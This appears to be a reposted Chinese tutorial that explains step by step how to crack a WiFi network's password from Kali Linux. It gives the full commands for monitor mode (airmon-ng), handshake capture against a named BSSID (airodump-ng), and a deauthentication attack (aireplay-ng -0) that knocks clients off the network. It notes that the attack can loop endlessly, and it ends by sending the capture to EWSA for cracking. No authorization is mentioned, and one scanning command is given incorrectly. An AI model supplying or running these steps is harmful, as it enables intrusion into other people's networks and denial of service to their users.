首先kali下必須有無線網卡,可以在筆記本上啟動,也可以外接usb無線網卡
把kali刻錄到u盤啟動了以後,打開終端。
輸入 airmon-ng
這條命令會列出支持破解wifi的網卡,如果你沒有列出任何東西的話,那就是你的網卡不支持。
接着輸入 ifconfig
顯示你的網絡配置,找到網卡的名稱,一般都是wlan0 紅框所在位置
airmon-ng start wlan0
這個命令的意思是将wlan0網卡設置為監聽模式
再輸入 ifconfig
看一下網卡名稱是不是還是wlan0
接着輸入airmon-ng wlan0
掃描無線網絡,注意wlan0這是網卡的名稱,在開啟監聽模式之後可能會變成wlan0mon,根據自己的實際情況輸入。
主要關注紅框裡面的兩個值bssid 和 ch 這兩個值下一步會用到的
接下來,再打開一個終端
airodump-ng -w Ciscotest -c 1 --bssid D8:24:BD:2F:C5:50 wlan0
抓取握手包
-w Ciscotest
保存握手包名為Ciscotest 在/root/目錄下
-c 1
信道為1 也就是前面一步中的ch項的值
--bssid D8:24:BD:2F:C5:50
獲取bssid為 D8:24:BD:2F:C5:50的握手包
wlan0
使用wlan0進行獲取
命令執行之後就進入了抓包狀态。
但是握手包是需要在那個wifi上有設備連接上去,才會産生握手包。
如果被動的等待設備的連接,那太浪費時間了
我們可以用命令來使連接上的設備斷開後重新連接獲取握手包。
重新再開一個終端
aireplay-ng -0 20 -a D8:24:BD:2F:C5:50 wlan0
-0
為模式中的一種:沖突攻擊模式,後面跟發送次數(設置為0,則為循環攻擊,不停的斷開連接,客戶端無法正常上網,-a
指定無線AP的mac地址,即為該無線網的bssid值,wlan0
你的無線設備)
一般發送20次就可以讓設備斷開再重新鍊接了
如果不行可以再發送幾次。
一直到抓包的窗口出現紅框中的字樣就是抓到握手包。
找到文件夾下的.cap結尾的握手包,複制到U盤上面。
在window下使用ewsa來進行跑包
,
更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!